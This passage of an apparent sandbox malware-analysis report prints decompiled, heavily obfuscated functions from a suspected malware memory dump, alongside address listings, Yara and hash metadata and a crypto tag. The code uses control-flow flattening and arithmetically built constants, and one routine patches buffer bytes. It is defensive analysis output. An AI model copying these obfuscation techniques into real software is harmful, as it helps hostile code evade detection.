				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				void* _t402;
				signed int _t469;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				void* _t493;
				signed int* _t548;
				void* _t549;
				signed int _t550;
				signed int _t551;
				void* _t553;
				void* _t554;
				void* _t557;

				_push(_a12);
				_t548 = _a4;
				_t549 = __edx;
				_push(_a8);
				_push(_t548);
				_push(__edx);
				_push(__ecx);
				E0121358A(_t402);
				_v44 = _v44 & 0x00000000;
				_t554 = _t553 + 0x14;
				_v52 = 0x5f7282;
				_v48 = 0x89717d;
				_t493 = 0x98552f7;
				_v176 = 0x4ae891;
				_v176 = _v176 + 0xffff480f;
				_t477 = 0x5f;
				_v176 = _v176 * 0x1e;
				_v176 = _v176 + 0xef6c;
				_v176 = _v176 ^ 0x08b2a22c;
				_v96 = 0x9b836e;
				_v96 = _v96 * 0x42;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0xbf171f1c;
				_v188 = 0x39f5fb;
				_v188 = _v188 | 0xb5d3fd22;
				_v188 = _v188 * 7;
				_v188 = _v188 / _t477;
				_v188 = _v188 ^ 0x02a82dbf;
				_v164 = 0xc4d427;
				_t478 = 0x19;
				_v164 = _v164 * 0x1a;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 << 5;
				_v164 = _v164 ^ 0x000e3016;
				_v120 = 0x779f59;
				_v120 = _v120 / _t478;
				_t479 = 0x32;
				_v120 = _v120 / _t479;
				_v120 = _v120 ^ 0x00036599;
				_v128 = 0x7d8a0a;
				_v128 = _v128 | 0xae961094;
				_t480 = 0x6a;
				_v128 = _v128 * 0x66;
				_v128 = _v128 ^ 0xb9d94b58;
				_v56 = 0x401a4b;
				_v56 = _v56 * 0x63;
				_v56 = _v56 ^ 0x18c76e15;
				_v112 = 0xa51ead;
				_v112 = _v112 << 9;
				_v112 = _v112 << 4;
				_v112 = _v112 ^ 0xa3d6d40b;
				_v104 = 0x7aa304;
				_v104 = _v104 + 0x6bca;
				_v104 = _v104 / _t480;
				_v104 = _v104 ^ 0x000b8ef7;
				_v132 = 0x1148b5;
				_v132 = _v132 ^ 0xf20311a1;
				_v132 = _v132 | 0x9815079a;
				_v132 = _v132 ^ 0xfa15838b;
				_v88 = 0xf2e7cb;
				_t550 = 0x2b;
				_v88 = _v88 / _t550;
				_v88 = _v88 ^ 0x00094260;
				_v148 = 0x1a540c;
				_t481 = 0x55;
				_v148 = _v148 * 0x6f;
				_v148 = _v148 / _t481;
				_v148 = _v148 / _t550;
				_v148 = _v148 ^ 0x000ba5a7;
				_v160 = 0x50bc7c;
				_v160 = _v160 >> 5;
				_v160 = _v160 << 0xc;
				_v160 = _v160 << 0xc;
				_v160 = _v160 ^ 0xe30c8c54;
				_v72 = 0xb4813e;
				_v72 = _v72 + 0xeb4b;
				_v72 = _v72 ^ 0x00bd2f3e;
				_v80 = 0x45ed5f;
				_v80 = _v80 ^ 0xed608d07;
				_v80 = _v80 ^ 0xed2512e7;
				_v168 = 0xeb9f3b;
				_v168 = _v168 >> 5;
				_v168 = _v168 + 0x6d96;
				_v168 = _v168 >> 6;
				_v168 = _v168 ^ 0x00009dae;
				_v68 = 0x5b4c56;
				_v68 = _v68 | 0x228a85d9;
				_v68 = _v68 ^ 0x22d2440e;
				_v60 = 0x613d83;
				_v60 = _v60 | 0xa9532b63;
				_v60 = _v60 ^ 0xa972f1ce;
				_v140 = 0x376939;
				_t163 =  &_v140; // 0x376939
				_t482 = 0x5d;
				_v140 =  *_t163 / _t482;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 + 0xffff8bdd;
				_v140 = _v140 ^ 0xfff86fc1;
				_v124 = 0x51f196;
				_v124 = _v124 + 0xffff9aeb;
				_t483 = 0x54;
				_v124 = _v124 / _t483;
				_v124 = _v124 ^ 0x000f7505;
				_v172 = 0x3012f5;
				_v172 = _v172 + 0x4134;
				_t551 = 0x31;
				_v172 = _v172 / _t551;
				_v172 = _v172 ^ 0x569dceb8;
				_v172 = _v172 ^ 0x56964419;
				_v76 = 0x97b467;
				_v76 = _v76 * 0x77;
				_v76 = _v76 ^ 0x468ec6d6;
				_v156 = 0x479670;
				_t484 = 0x1a;
				_v156 = _v156 / _t484;
				_v156 = _v156 << 2;
				_v156 = _v156 + 0xd9ad;
				_v156 = _v156 ^ 0x000d599b;
				_v180 = 0xbae7b9;
				_v180 = _v180 + 0xffffa92a;
				_v180 = _v180 + 0x4383;
				_v180 = _v180 + 0xffffeefb;
				_v180 = _v180 ^ 0x00b5d3cb;
				_v192 = 0x9a0431;
				_v192 = _v192 >> 8;
				_v192 = _v192 ^ 0x0f90ecbf;
				_v192 = _v192 + 0xffff1b33;
				_v192 = _v192 ^ 0x0f80084f;
				_v108 = 0x55fe36;
				_t485 = 0x74;
				_v108 = _v108 / _t485;
				_v108 = _v108 / _t551;
				_v108 = _v108 ^ 0x00038223;
				_v196 = 0xda517d;
				_v196 = _v196 + 0xffff96ec;
				_v196 = _v196 + 0xffffe8d5;
				_t486 = 0x44;
				_v196 = _v196 / _t486;
				_v196 = _v196 ^ 0x00010b42;
				_v116 = 0x376585;
				_t487 = 0x12;
				_v116 = _v116 / _t487;
				_v116 = _v116 + 0xffff0b99;
				_v116 = _v116 ^ 0x000eba6f;
				_v184 = 0xb4770e;
				_v184 = _v184 >> 9;
				_v184 = _v184 << 5;
				_t488 = 0x68;
				_v184 = _v184 / _t488;
				_v184 = _v184 ^ 0x000b25b3;
				_v92 = 0xc756a0;
				_v92 = _v92 + 0xffff476a;
				_v92 = _v92 * 0x11;
				_v92 = _v92 ^ 0x0d3f43a1;
				_v100 = 0xc46332;
				_v100 = _v100 | 0x1d93fa0a;
				_v100 = _v100 ^ 0x06f17946;
				_v100 = _v100 ^ 0x1b22c1d7;
				_v84 = 0xf98049;
				_v84 = _v84 | 0x1c19946c;
				_v84 = _v84 ^ 0x1cf939e5;
				_v64 = 0xaf1718;
				_v64 = _v64 * 0x64;
				_v64 = _v64 ^ 0x4461e439;
				_v136 = 0xde22af;
				_v136 = _v136 << 5;
				_v136 = _v136 | 0xbf66eb0e;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0004fef1;
				_v144 = 0xeb6203;
				_v144 = _v144 >> 8;
				_t489 = 0x4c;
				_v144 = _v144 / _t489;
				_v144 = _v144 >> 0xc;
				_v144 = _v144 ^ 0x000159a9;
				_v152 = 0x58cc79;
				_v152 = _v152 + 0x7b67;
				_v152 = _v152 >> 6;
				_t490 = 0x3e;
				_v152 = _v152 / _t490;
				_v152 = _v152 ^ 0x0007a5ba;
				goto L1;
				do {
					while(1) {
						L1:
						_t557 = _t493 - 0x7461a24;
						if(_t557 > 0) {
							break;
						}
						if(_t557 == 0) {
							E01232A88(_v68, _v60, _v140, _v124,  *((intOrPtr*)(_t549 + 0x14)),  &_v40);
							_t554 = _t554 + 0x10;
							_t493 = 0x2469622;
							continue;
						} else {
							if(_t493 == 0x2469622) {
								E01232A88(_v172, _v76, _v156, _v180,  *((intOrPtr*)(_t549 + 4)),  &_v40);
								_t554 = _t554 + 0x10;
								_t493 = 0xaef6787;
								continue;
							} else {
								if(_t493 == 0x38da483) {
									E0122DF47(_v128, _t548, _v56,  &_v40, _v112);
									_t554 = _t554 + 0xc;
									_t493 = 0x4cad5c1;
									continue;
								} else {
									if(_t493 == 0x4cad5c1) {
										E0121CE5A(_v104, _v132, __eflags, _v88, _v148, _t549 + 8,  &_v40);
										_t554 = _t554 + 0x10;
										_t493 = 0x92a4a1b;
										continue;
									} else {
										if(_t493 == 0x5df819a) {
											_push(_t493);
											_push(_t493);
											_t469 = E01225212(_t548[1]);
											_t554 = _t554 + 0xc;
											 *_t548 = _t469;
											__eflags = _t469;
											if(__eflags != 0) {
												_t493 = 0x38da483;
												continue;
											}
										} else {
											_t562 = _t493 - 0x628664a;
											if(_t493 != 0x628664a) {
												goto L26;
											} else {
												E0121CE5A(_v64, _v136, _t562, _v144, _v152, _t549 + 0x20,  &_v40);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t548 != 0x00000000;
					}
					__eflags = _t493 - 0x92a4a1b;
					if(_t493 == 0x92a4a1b) {
						E01232A88(_v160, _v72, _v80, _v168,  *((intOrPtr*)(_t549 + 0x1c)),  &_v40);
						_t554 = _t554 + 0x10;
						_t493 = 0x7461a24;
						goto L26;
					} else {
						__eflags = _t493 - 0x98552f7;
						if(__eflags == 0) {
							_t493 = 0x9a15b9c;
							 *_t548 =  *_t548 & 0x00000000;
							_t548[1] = _v176;
							goto L1;
						} else {
							__eflags = _t493 - 0x9a15b9c;
							if(_t493 == 0x9a15b9c) {
								_t548[1] = E012146FA(_t549);
								_t493 = 0x5df819a;
								goto L1;
							} else {
								__eflags = _t493 - 0x9e9b60d;
								if(_t493 == 0x9e9b60d) {
									E01232A88(_v184, _v92, _v100, _v84,  *((intOrPtr*)(_t549 + 0x28)),  &_v40);
									_t554 = _t554 + 0x10;
									_t493 = 0x628664a;
									goto L1;
								} else {
									__eflags = _t493 - 0xaef6787;
									if(_t493 != 0xaef6787) {
										goto L26;
									} else {
										E01232A88(_v192, _v108, _v196, _v116,  *((intOrPtr*)(_t549 + 0x10)),  &_v40);
										_t554 = _t554 + 0x10;
										_t493 = 0x9e9b60d;
										goto L1;
									}
								}
							}
						}
					}
					goto L9;
					L26:
					__eflags = _t493 - 0x5c1c891;
				} while (__eflags != 0);
				goto L9;
			}



































































                          0x01229714
                          0x0122971b
                          0x01229722
                          0x01229724
                          0x0122972b
                          0x0122972c
                          0x0122972d
                          0x0122972e
                          0x01229733
                          0x0122973b
                          0x0122973e
                          0x0122974b
                          0x01229756
                          0x0122975b
                          0x01229763
                          0x01229772
                          0x01229775
                          0x01229779
                          0x01229781
                          0x01229789
                          0x01229796
                          0x0122979a
                          0x0122979f
                          0x012297a7
                          0x012297af
                          0x012297bc
                          0x012297c8
                          0x012297cc
                          0x012297d4
                          0x012297e1
                          0x012297e4
                          0x012297e8
                          0x012297ed
                          0x012297f2
                          0x012297fa
                          0x0122980a
                          0x01229812
                          0x01229817
                          0x0122981d
                          0x01229825
                          0x0122982d
                          0x0122983a
                          0x0122983b
                          0x0122983f
                          0x01229847
                          0x0122985a
                          0x01229861
                          0x0122986c
                          0x01229874
                          0x01229879
                          0x0122987e
                          0x01229886
                          0x0122988e
                          0x0122989c
                          0x012298a0
                          0x012298a8
                          0x012298b2
                          0x012298ba
                          0x012298c2
                          0x012298ca
                          0x012298de
                          0x012298e3
                          0x012298ea
                          0x012298f5
                          0x01229904
                          0x01229907
                          0x01229913
                          0x0122991f
                          0x01229923
                          0x0122992b
                          0x01229933
                          0x01229938
                          0x0122993d
                          0x01229942
                          0x0122994a
                          0x01229955
                          0x01229960
                          0x0122996b
                          0x01229976
                          0x01229981
                          0x0122998c
                          0x01229994
                          0x01229999
                          0x012299a1
                          0x012299a6
                          0x012299ae
                          0x012299b9
                          0x012299c4
                          0x012299cf
                          0x012299da
                          0x012299e5
                          0x012299f0
                          0x012299f8
                          0x012299fc
                          0x01229a01
                          0x01229a07
                          0x01229a0c
                          0x01229a14
                          0x01229a1c
                          0x01229a24
                          0x01229a30
                          0x01229a35
                          0x01229a3b
                          0x01229a43
                          0x01229a4b
                          0x01229a57
                          0x01229a5a
                          0x01229a5e
                          0x01229a66
                          0x01229a6e
                          0x01229a81
                          0x01229a88
                          0x01229a93
                          0x01229aa3
                          0x01229aa8
                          0x01229aac
                          0x01229ab1
                          0x01229ab9
                          0x01229ac1
                          0x01229ac9
                          0x01229ad1
                          0x01229ad9
                          0x01229ae1
                          0x01229ae9
                          0x01229af1
                          0x01229af6
                          0x01229afe
                          0x01229b06
                          0x01229b0e
                          0x01229b1c
                          0x01229b21
                          0x01229b2d
                          0x01229b33
                          0x01229b3b
                          0x01229b43
                          0x01229b4b
                          0x01229b57
                          0x01229b5c
                          0x01229b62
                          0x01229b6a
                          0x01229b76
                          0x01229b7b
                          0x01229b81
                          0x01229b89
                          0x01229b91
                          0x01229b99
                          0x01229b9e
                          0x01229ba7
                          0x01229baa
                          0x01229bae
                          0x01229bb6
                          0x01229bbe
                          0x01229bcb
                          0x01229bcf
                          0x01229bd7
                          0x01229bdf
                          0x01229be7
                          0x01229bef
                          0x01229bf7
                          0x01229c02
                          0x01229c0d
                          0x01229c18
                          0x01229c2b
                          0x01229c32
                          0x01229c3d
                          0x01229c45
                          0x01229c4a
                          0x01229c52
                          0x01229c57
                          0x01229c61
                          0x01229c6e
                          0x01229c79
                          0x01229c7e
                          0x01229c84
                          0x01229c89
                          0x01229c91
                          0x01229c99
                          0x01229ca1
                          0x01229caa
                          0x01229cb2
                          0x01229cb6
                          0x01229cb6
                          0x01229cbe
                          0x01229cbe
                          0x01229cbe
                          0x01229cbe
                          0x01229cc0
                          0x00000000
                          0x00000000
                          0x01229cc6
                          0x01229e0f
                          0x01229e14
                          0x01229e17
                          0x00000000
                          0x01229ccc
                          0x01229cd2
                          0x01229ddc
                          0x01229de1
                          0x01229de4
                          0x00000000
                          0x01229cd8
                          0x01229cda
                          0x01229dac
                          0x01229db1
                          0x01229db4
                          0x00000000
                          0x01229ce0
                          0x01229ce6
                          0x01229d81
                          0x01229d86
                          0x01229d89
                          0x00000000
                          0x01229ce8
                          0x01229cee
                          0x01229d45
                          0x01229d46
                          0x01229d4a
                          0x01229d4f
                          0x01229d52
                          0x01229d54
                          0x01229d56
                          0x01229d58
                          0x00000000
                          0x01229d58
                          0x01229cf0
                          0x01229cf0
                          0x01229cf6
                          0x00000000
                          0x01229cfc
                          0x01229d1b
                          0x01229d20
                          0x01229cf6
                          0x01229cee
                          0x01229ce6
                          0x01229cda
                          0x01229cd2
                          0x01229d23
                          0x01229d34
                          0x01229d34
                          0x01229e21
                          0x01229e27
                          0x01229f01
                          0x01229f06
                          0x01229f09
                          0x00000000
                          0x01229e2d
                          0x01229e2d
                          0x01229e33
                          0x01229ed0
                          0x01229ed5
                          0x01229ed8
                          0x00000000
                          0x01229e39
                          0x01229e39
                          0x01229e3f
                          0x01229ebf
                          0x01229ec2
                          0x00000000
                          0x01229e41
                          0x01229e41
                          0x01229e47
                          0x01229ea6
                          0x01229eab
                          0x01229eae
                          0x00000000
                          0x01229e49
                          0x01229e49
                          0x01229e4f
                          0x00000000
                          0x01229e55
                          0x01229e70
                          0x01229e75
                          0x01229e78
                          0x00000000
                          0x01229e78
                          0x01229e4f
                          0x01229e47
                          0x01229e3f
                          0x01229e33
                          0x00000000
                          0x01229f0b
                          0x01229f0b
                          0x01229f0b
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4A$9i7$9aD$K$_E$`B$g{$l
                          • API String ID: 0-2935683833
                          • Opcode ID: 389e72c3852df6f769d68ef1459b818342f1c290c6ce2fc85ac6829f5ed07867
                          • Instruction ID: 499408078087d616ddb4a3219b53997590252936d481ad942e598f6331360b6b
                          • Opcode Fuzzy Hash: 389e72c3852df6f769d68ef1459b818342f1c290c6ce2fc85ac6829f5ed07867
                          • Instruction Fuzzy Hash: EA1210B1508381DFD768CF25C489A5FFBE2BBD8708F50891DE29A86260D7B19949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012184F0, Relevance: 10.4, Strings: 8, Instructions: 374COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E012184F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v36;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v84;
				intOrPtr _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				void* _t344;
				void* _t382;
				void* _t390;
				intOrPtr _t396;
				void* _t398;
				signed int _t400;
				intOrPtr* _t402;
				void* _t404;
				signed char* _t417;
				signed char* _t444;
				intOrPtr* _t448;
				intOrPtr _t449;
				intOrPtr _t450;
				void* _t451;
				signed char* _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				signed int _t460;
				void* _t461;
				void* _t462;
				void* _t464;

				_t402 = _a16;
				_t449 = _a4;
				_t448 = _a8;
				_push(_t402);
				_push(_a12);
				_push(_t448);
				_push(_t449);
				_push(__edx);
				_push(__ecx);
				E0121358A(_t344);
				_v124 = 0xfb92e3;
				_t462 = _t461 + 0x18;
				_v124 = _v124 << 0xb;
				_v124 = _v124 ^ 0xdc971800;
				_t404 = 0xc335b1;
				_v136 = 0xc6cd3f;
				_v136 = _v136 + 0xffff881d;
				_v136 = _v136 ^ 0x00c6551c;
				_v220 = 0x39b606;
				_t453 = 0x60;
				_v96 = _v96 & 0x00000000;
				_v220 = _v220 * 0x27;
				_v220 = _v220 + 0xf4c5;
				_v220 = _v220 / _t453;
				_v220 = _v220 ^ 0x0017743f;
				_v140 = 0xe66565;
				_t31 =  &_v140; // 0xe66565
				_t454 = 7;
				_v140 =  *_t31 / _t454;
				_v140 = _v140 ^ 0x002d4afb;
				_v188 = 0x1644e4;
				_v188 = _v188 | 0x24adbee9;
				_v188 = _v188 + 0x42a7;
				_v188 = _v188 ^ 0x24c1907e;
				_v168 = 0x5bbfd5;
				_v168 = _v168 ^ 0xaf73a613;
				_v168 = _v168 * 0x43;
				_v168 = _v168 ^ 0xd77759df;
				_v132 = 0x7bc3bb;
				_v132 = _v132 + 0xfffff6ab;
				_v132 = _v132 ^ 0x00710d61;
				_v208 = 0xe6ee0d;
				_v208 = _v208 | 0x92091f4c;
				_v208 = _v208 >> 3;
				_v208 = _v208 * 0x61;
				_v208 = _v208 ^ 0xf59aa747;
				_v216 = 0x653a45;
				_v216 = _v216 * 0x3f;
				_v216 = _v216 + 0xffff4e97;
				_v216 = _v216 ^ 0x96b1be51;
				_v216 = _v216 ^ 0x8e5450e8;
				_v100 = 0xfd7786;
				_v100 = _v100 + 0xdb9a;
				_v100 = _v100 ^ 0x00fa5afe;
				_v116 = 0x47cdb0;
				_v116 = _v116 | 0x311992f4;
				_v116 = _v116 ^ 0x315f71c9;
				_v184 = 0xfc1676;
				_v184 = _v184 >> 4;
				_v184 = _v184 + 0xf942;
				_v184 = _v184 ^ 0x001256f7;
				_v192 = 0x4a7e97;
				_v192 = _v192 << 0xc;
				_v192 = _v192 + 0xffff97c8;
				_v192 = _v192 ^ 0xa7e5590e;
				_v108 = 0xa591e;
				_v108 = _v108 >> 0xd;
				_v108 = _v108 ^ 0x000f257c;
				_v176 = 0x7de015;
				_v176 = _v176 >> 3;
				_v176 = _v176 | 0x30b98b85;
				_v176 = _v176 ^ 0x30b5f870;
				_v144 = 0x9a82cf;
				_t455 = 0x2e;
				_v144 = _v144 * 0x54;
				_v144 = _v144 ^ 0x32beedd6;
				_v228 = 0x15eedb;
				_v228 = _v228 ^ 0x74b4188e;
				_v228 = _v228 + 0xffff6700;
				_v228 = _v228 + 0xcf4c;
				_v228 = _v228 ^ 0x74a119fc;
				_v156 = 0xd6eb4f;
				_v156 = _v156 ^ 0x50ac1b1c;
				_v156 = _v156 + 0xeec5;
				_v156 = _v156 ^ 0x5070863b;
				_v204 = 0x553780;
				_v204 = _v204 >> 1;
				_v204 = _v204 ^ 0x20338dbe;
				_v204 = _v204 >> 0xb;
				_v204 = _v204 ^ 0x0007c317;
				_v236 = 0xfd5340;
				_v236 = _v236 << 0xa;
				_v236 = _v236 ^ 0x416403b2;
				_v236 = _v236 * 0x67;
				_v236 = _v236 ^ 0x7c86c217;
				_v104 = 0x6a259;
				_v104 = _v104 * 0x24;
				_v104 = _v104 ^ 0x00ee0ac9;
				_v180 = 0x123564;
				_v180 = _v180 ^ 0x56196b0a;
				_v180 = _v180 >> 0xd;
				_v180 = _v180 ^ 0x000ca7a4;
				_v212 = 0xa6e89f;
				_v212 = _v212 << 3;
				_v212 = _v212 / _t455;
				_t456 = 0x43;
				_v212 = _v212 / _t456;
				_v212 = _v212 ^ 0x000fc1f5;
				_v148 = 0x6d0114;
				_v148 = _v148 | 0xf3e4699c;
				_v148 = _v148 ^ 0xf3ea1085;
				_v164 = 0x815c43;
				_v164 = _v164 >> 6;
				_v164 = _v164 ^ 0x421e5d43;
				_v164 = _v164 ^ 0x421d78e1;
				_v240 = 0xa2d65;
				_v240 = _v240 + 0xffff976c;
				_v240 = _v240 << 5;
				_v240 = _v240 << 5;
				_v240 = _v240 ^ 0x27113ac0;
				_v112 = 0x21947b;
				_t457 = 0x17;
				_v112 = _v112 / _t457;
				_v112 = _v112 ^ 0x000bf513;
				_v232 = 0xec1696;
				_v232 = _v232 + 0x18fb;
				_v232 = _v232 + 0xffff093e;
				_v232 = _v232 + 0xffff866b;
				_v232 = _v232 ^ 0x00e84135;
				_v172 = 0xd2924a;
				_v172 = _v172 + 0xffffa471;
				_v172 = _v172 * 0x67;
				_v172 = _v172 ^ 0x549231c4;
				_v224 = 0x486647;
				_v224 = _v224 >> 0xd;
				_v224 = _v224 | 0x5ff7df7d;
				_v224 = _v224 ^ 0x5fff12d6;
				_v152 = 0x7ee2b;
				_v152 = _v152 >> 9;
				_t458 = 0x3e;
				_v152 = _v152 / _t458;
				_v152 = _v152 ^ 0x0005a8cb;
				_v160 = 0x6a47dd;
				_t459 = 0x27;
				_v160 = _v160 * 0x36;
				_v160 = _v160 ^ 0xb21a04da;
				_v160 = _v160 ^ 0xa47e70e8;
				_v120 = 0xaabd8a;
				_v120 = _v120 + 0x4379;
				_v120 = _v120 ^ 0x00a453b8;
				_v128 = 0x317d8e;
				_v128 = _v128 * 0x1b;
				_v128 = _v128 ^ 0x0534d6ac;
				_v196 = 0xe1b0a4;
				_v196 = _v196 + 0xffffc8f3;
				_t460 = _v96;
				_v196 = _v196 / _t459;
				_v196 = _v196 ^ 0x0005c81a;
				_v200 = 0x9d0a1;
				_v200 = _v200 >> 0xb;
				_v200 = _v200 * 0x46;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 ^ 0x00000081;
				goto L1;
				do {
					while(1) {
						L1:
						_t464 = _t404 - 0x6a00919;
						if(_t464 > 0) {
							break;
						}
						if(_t464 == 0) {
							_t450 =  *_t402;
							E0121316A(_v104, _v180, _v212, _t450);
							_t451 = _t450 + _v220;
							E01232C81(_v148, _v92, _v164, _t451, _v240, _v88);
							_push(_v232);
							_t452 = _t451 + _v88;
							_push(_t460);
							E0122B0E0(_t452, _v112);
							_t444 =  &(_t452[_t460]);
							_t462 = _t462 + 0x20;
							_t417 = _t452;
							if(_t452 >= _t444) {
								L17:
								_push(_t417);
								_t390 = E01212C02(0, 0xe);
								_t404 = 0xaf54993;
								 *((char*)(_t390 + _t452)) = 0;
								_t449 = _a4;
								continue;
							} else {
								goto L14;
							}
							do {
								L14:
								if(( *_t417 & 0x000000ff) == _v124) {
									 *_t417 = 0xc3;
								}
								_t417 =  &(_t417[1]);
							} while (_t417 < _t444);
							goto L17;
						}
						if(_t404 == 0x81e256) {
							E0121AE43(_v84, _v120, _v128);
							L30:
							return _v96;
						}
						if(_t404 == 0xc335b1) {
							_t404 = 0x3801220;
							continue;
						}
						if(_t404 == 0x13c9130) {
							_push(_t404);
							_push(_t404);
							_t396 = E01225212( *((intOrPtr*)(_t402 + 4)));
							_t462 = _t462 + 0xc;
							 *_t402 = _t396;
							if(_t396 == 0) {
								_t404 = 0xaf54993;
							} else {
								_v96 = 1;
								_t404 = 0x6a00919;
							}
							continue;
						}
						if(_t404 != 0x3801220) {
							goto L27;
						}
						_t398 = E0122A29B(_v140,  *_t448,  &_v36, _v188, _v168, _v132,  *((intOrPtr*)(_t448 + 4)));
						_t462 = _t462 + 0x18;
						if(_t398 == 0) {
							goto L30;
						}
						_t404 = 0xfc30d66;
					}
					if(_t404 == 0xaf54993) {
						E0121AE43(_v92, _v152, _v160);
						_t404 = 0x81e256;
						goto L27;
					}
					if(_t404 == 0xbc74ee4) {
						_push(_t404);
						_t460 = E01212C02(_v196, _v200);
						_t404 = 0x13c9130;
						 *((intOrPtr*)(_t402 + 4)) = _v136 + _v88 + _t460;
						goto L1;
					}
					if(_t404 == 0xfc30d66) {
						_v72 = _t449;
						_v52 =  &_v36;
						_v68 =  *_t448;
						_v64 =  *((intOrPtr*)(_t448 + 4));
						_v48 = 0x20;
						_t382 = E01216453(_v208,  &_v84,  &_v76, _v216, _v100, _v116);
						_t462 = _t462 + 0x10;
						if(_t382 == 0) {
							goto L30;
						}
						_t404 = 0xfda96aa;
						goto L1;
					}
					if(_t404 != 0xfda96aa) {
						goto L27;
					}
					_t400 = E0121544C(_v184,  &_v84, _v192, _v108,  &_v92);
					_t462 = _t462 + 0xc;
					asm("sbb ecx, ecx");
					_t404 = ( ~_t400 & 0x0b456c8e) + 0x81e256;
					goto L1;
					L27:
				} while (_t404 != 0x4ce11cf);
				goto L30;
			}












































































                          0x012184f7
                          0x01218500
                          0x01218508
                          0x0121850f
                          0x01218510
                          0x01218517
                          0x01218518
                          0x01218519
                          0x0121851a
                          0x0121851b
                          0x01218520
                          0x0121852b
                          0x0121852e
                          0x01218538
                          0x01218543
                          0x01218548
                          0x01218550
                          0x01218558
                          0x01218560
                          0x0121856f
                          0x01218572
                          0x0121857a
                          0x0121857e
                          0x0121858e
                          0x01218592
                          0x0121859a
                          0x012185a2
                          0x012185a6
                          0x012185a9
                          0x012185ad
                          0x012185b5
                          0x012185bd
                          0x012185c5
                          0x012185cd
                          0x012185d5
                          0x012185dd
                          0x012185ea
                          0x012185ee
                          0x012185f6
                          0x01218601
                          0x0121860c
                          0x01218617
                          0x0121861f
                          0x01218627
                          0x01218631
                          0x01218635
                          0x0121863d
                          0x0121864a
                          0x0121864e
                          0x01218656
                          0x0121865e
                          0x01218666
                          0x01218671
                          0x0121867c
                          0x01218687
                          0x01218692
                          0x0121869d
                          0x012186a8
                          0x012186b0
                          0x012186b5
                          0x012186bd
                          0x012186c5
                          0x012186cd
                          0x012186d2
                          0x012186da
                          0x012186e2
                          0x012186ed
                          0x012186f7
                          0x01218702
                          0x0121870a
                          0x0121870f
                          0x01218717
                          0x0121871f
                          0x0121872e
                          0x01218731
                          0x01218735
                          0x0121873d
                          0x01218745
                          0x0121874d
                          0x01218755
                          0x0121875d
                          0x01218765
                          0x0121876d
                          0x01218775
                          0x0121877d
                          0x01218785
                          0x0121878d
                          0x01218791
                          0x01218799
                          0x0121879e
                          0x012187a6
                          0x012187ae
                          0x012187b3
                          0x012187c0
                          0x012187c4
                          0x012187cc
                          0x012187df
                          0x012187e6
                          0x012187f1
                          0x012187f9
                          0x01218801
                          0x01218806
                          0x0121880e
                          0x01218816
                          0x01218823
                          0x0121882b
                          0x01218830
                          0x01218836
                          0x0121883e
                          0x01218846
                          0x0121884e
                          0x01218856
                          0x0121885e
                          0x01218863
                          0x0121886b
                          0x01218873
                          0x0121887b
                          0x01218883
                          0x01218888
                          0x0121888d
                          0x01218895
                          0x012188a7
                          0x012188aa
                          0x012188b1
                          0x012188bc
                          0x012188c4
                          0x012188cc
                          0x012188d4
                          0x012188dc
                          0x012188e4
                          0x012188ec
                          0x012188f9
                          0x012188ff
                          0x01218907
                          0x0121890f
                          0x01218914
                          0x0121891c
                          0x01218924
                          0x0121892c
                          0x01218937
                          0x0121893c
                          0x01218942
                          0x0121894a
                          0x01218957
                          0x01218958
                          0x0121895c
                          0x01218964
                          0x0121896c
                          0x01218977
                          0x01218982
                          0x0121898d
                          0x012189a0
                          0x012189a7
                          0x012189b2
                          0x012189ba
                          0x012189c8
                          0x012189cf
                          0x012189d3
                          0x012189db
                          0x012189e3
                          0x012189ed
                          0x012189f1
                          0x012189f6
                          0x012189f6
                          0x012189fe
                          0x012189fe
                          0x012189fe
                          0x012189fe
                          0x01218a04
                          0x00000000
                          0x00000000
                          0x01218a0a
                          0x01218ac2
                          0x01218ad4
                          0x01218add
                          0x01218afd
                          0x01218b02
                          0x01218b06
                          0x01218b16
                          0x01218b17
                          0x01218b1c
                          0x01218b1f
                          0x01218b22
                          0x01218b26
                          0x01218b3c
                          0x01218b46
                          0x01218b49
                          0x01218b50
                          0x01218b55
                          0x01218b59
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01218b28
                          0x01218b28
                          0x01218b32
                          0x01218b34
                          0x01218b34
                          0x01218b37
                          0x01218b38
                          0x00000000
                          0x01218b28
                          0x01218a16
                          0x01218cb4
                          0x01218cba
                          0x01218ccb
                          0x01218ccb
                          0x01218a22
                          0x01218ab8
